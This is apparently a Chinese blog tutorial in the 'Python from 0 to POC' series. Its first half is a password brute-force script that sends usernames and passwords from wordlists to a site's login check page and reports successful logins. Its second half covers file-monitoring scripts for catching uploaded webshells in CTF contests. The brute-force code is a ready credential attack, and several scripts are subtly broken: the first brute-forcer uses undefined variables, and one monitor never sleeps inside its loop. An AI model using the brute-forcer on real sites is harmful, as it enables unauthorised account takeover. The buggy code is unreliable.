blubiu

My Love

上网不网恋,简直浪费电.


Python从0到POC编写--实用小脚本02


前言:

一些实用小脚本02。


目录:


爆破脚本:

爆破脚本也是我们经常使用的东西

这里就简单讲讲后台爆破脚本的编写吧

在编写之前,我们先通过访问网站去看看情况

首先我们可以先登录看看

输入账号 admin ,密码 12345

登录失败,提示 用户名或密码错误

images


在输入正确的密码 123456 后,则会跳到用户界面

然后我们可以通过这个信息去判断是否登录成功

images


现在我们有了登录密码,有了判断是否登录成功的信息

还有就是如何构造 post

我们可以先用 burp 抓一下看看

现在我们可以看到,这些数据发送到了 /user/logCheck.php 的页面,

很明显这是判断用户名和密码的,

POST 数据为 user=admin&pass=123456&submit=login

images


有了这些信息,就可以写脚本了,

脚本其实跟前面的一些类似,无非就是判断不同

直接来看代码

假设我们知道用户名为 admin

那么我们可以直接爆破密码,

使用 format() 函数把密码传进去

# -*- coding: utf-8 -*-

import requests
import time
import re

def login(pwd):

	try:
		headers = {

			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0",
			"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
			"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"

		}

		url = "http://www.vd.com/user/logCheck.php"

		login = {"user":"admin","pass":"{}".format(pwd),"submit":"login"}

		r = requests.post(url,headers=headers,data=login)

		r.encoding = 'utf-8'

		if '用户名或密码错误' in r.text:

			print("用户名: " +user+ " 密码: " + pwd +" -----> 登录失败")

		else:

			print("用户名: " +user+ " 密码: " + pwd + " -----> 登录成功")

	except:
		print("用户名: " +user+ " 密码: " + pwd + " -----> 无法访问")

password = open('D:/top100.txt','r')

for pwd in password.readlines():

	pwd = pwd.strip('\n')
	login(pwd)


username.close()

下面是运行结果

images


假设用户名也不知道,那么我们也可以连用户名也一起爆破,

给用户名也加一个 format() 就行了

下面是代码

使用 for 循环来传入用户名和密码进行爆破

import requests
import time
import re

def login(user,pwd):

	try:
		headers = {

			"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0",
			"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
			"Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"

		}

		url = "http://www.vd.com/user/logCheck.php"

		login = {"user":"{}".format(user),"pass":"{}".format(pwd),"submit":"login"}

		r = requests.post(url,headers=headers,data=login)

		r.encoding = 'utf-8'

		if '用户名或密码错误' in r.text:

			print("用户名: " +user+ " 密码: " + pwd +" -----> 登录失败")

		else:

			print("用户名: " +user+ " 密码: " + pwd + " -----> 登录成功")

	except:
		print("用户名: " +user+ " 密码: " + pwd + " -----> 无法访问")

username = open('D:/user.txt','r')

for user in username.readlines():
	user = user.strip('\n')
	password = open('D:/top100.txt','r')
	
	for pwd in password.readlines():

		pwd = pwd.strip('\n')
		login(user,pwd)


username.close()
password.close()

运行结果

验证完 admin 就验证 root

images


文件监控:

在ctf线下赛中,经常会遇到文件上传漏洞,

那么在我们不会修复漏洞的情况下,就会被挂马 getshell了,

然而我们即使知道上传的文件在哪里,

那么也不可能一直守着那个文件夹删除文件,

你删除也没有别人的脚本操作快,你删除时别人已经 getflag 了,

在这种情况下,我们就需要一个文件监控脚本来帮助我们去完成这个操作。


编写思路:

先获取原文件夹里的文件,做一个白名单,

然后监控是否有新增文件


方法一:

先来看看代码,编写思路是这样子的,

将要监控的文件夹复制到其他地方,当作一个白名单,

然后重复比对这两个文件夹里面的内容,

如果在白名单上没有的,那么就是新增的文件,

下面是一个纯监控脚本,如需要后续操作,比如删除,可自行添加

import os
import shutil
import time

def backup(path1,path2):

	global file_list

	if os.path.isdir(path2):  # 判断白名单文件夹是否存在

		file_list = os.listdir(path2)   # 白名单文件

	else:

		shutil.copytree(path1,path2)   # 将 path1 文件复制到 path2 作为白名单
		file_list = os.listdir(path2)  # 白名单文件

def checkfile(file_list):

	while 1:

		check_file = os.listdir(path1)  # 要监控的文件夹
			
		tmp = [file for file in check_file if not file in file_list] # 列表推导式,获取差集

		if tmp: # 判断是否有新增文件
			for file in tmp:
				print('发现新文件 -----> ' + file)
				file_list.append(str(file))       # 避免重复输出
		else:
			pass

	# print(tmp)

	time.sleep(3)  # 每3秒循环一次

if __name__ == '__main__':

	path1 = 'D:/123'  # 要监控的文件夹,123为文件夹名字
	path2 = 'E:/123'  # 白名单路径,123为文件夹名字
	backup(path1,path2)
	checkfile(file_list)

最后效果就是这样子的

images


除了列表推导式,我们还可以用其他方法获取差集,

那就是使用 difference() 函数,

这种方式比列表推导式更高效

代码其实都差不多,这里就不做更多的介绍了

import os
import shutil
import time

def backup(path1,path2):

	global file_list

	if os.path.isdir(path2):  # 判断白名单文件夹是否存在

		file_list = os.listdir(path2)   # 白名单文件

	else:

		shutil.copytree(path1,path2)   # 将 path1 文件复制到 path2 作为白名单
		file_list = os.listdir(path2)  # 白名单文件

def checkfile(file_list):

	while 1:

		check_file = os.listdir(path1)  # 要监控的文件夹
			
		tmp = list(set(check_file).difference(set(file_list))) # 获取差集,check_file 中有,而 file_list 中没有

		if tmp: # 判断是否有新增文件
			for file in tmp:
				print('发现新文件 -----> ' + file)
				file_list.append(str(file))       # 避免重复输出
		else:
			pass

	# print(tmp)

	time.sleep(3)  # 每3秒循环一次

if __name__ == '__main__':

	path1 = 'D:/123'  # 要监控的文件夹,123为文件夹名字
	path2 = 'E:/123'  # 白名单路径,123为文件夹名字
	backup(path1,path2)
	checkfile(file_list)

方法二:

方法一中复制文件夹到其他地方的方式颇为笨重 ,

如果要监控的目录文件非常多,那么就会非常不方便

下面这个方法,不需要复制文件夹也能实现监控效果,

在脚本第一次运行的时候获取一个初始文件列表 file_list

然后在第二次以及后面的运行中获取的文件作为 check_dir

然后再判断两个列表中是否有不相同的文件存在

脚本运行后,你往文件夹丢文件就能看到效果了,脚本默认是 3 秒检测一次。

import os
import time
	
def list_dir(filepath):
	
	global file_list	
	file_list = os.listdir(filepath)  # 获取初始文件列表,作为白名单

def checkfile(filepath):

	while 1:

	 	check_dir = os.listdir(filepath)  # 获取路径下的文件

	 	for file in check_dir:

	 		if str(file) not in str(file_list):
	 			print('发现新文件 -----> ' + file)
	 			file_list.append(str(file))
	 		else:
	 			pass

	 	time.sleep(3)  # 3秒循环一次


if __name__ == '__main__':

	filepath = 'D:/123'    # 要监控的目录路径,D盘下的123文件夹
	list_dir(filepath)
	checkfile(filepath)

效果呢,也是一样的

images


总结:

如果在比赛中,time.sleep 可能就不需要了,

还要增加一个删除操作,不管上传什么东西,都给删除掉

细心的小伙伴会发现脚本中的bug,

比如这个 append() 操作,这是为了防止循环打印相同的文件而添加的操作,

但是这个操作也导致了一个 bug ,就是第二次上传相同文件名的文件时就会进入白名单,

当然,如果我们添加了删除操作,那么就可以取消 append() 了,

差不多就说到这里了,

Python从0到POC编写 这个系列也差不多结束了,

如果后续有其他的东西,还会添加上去。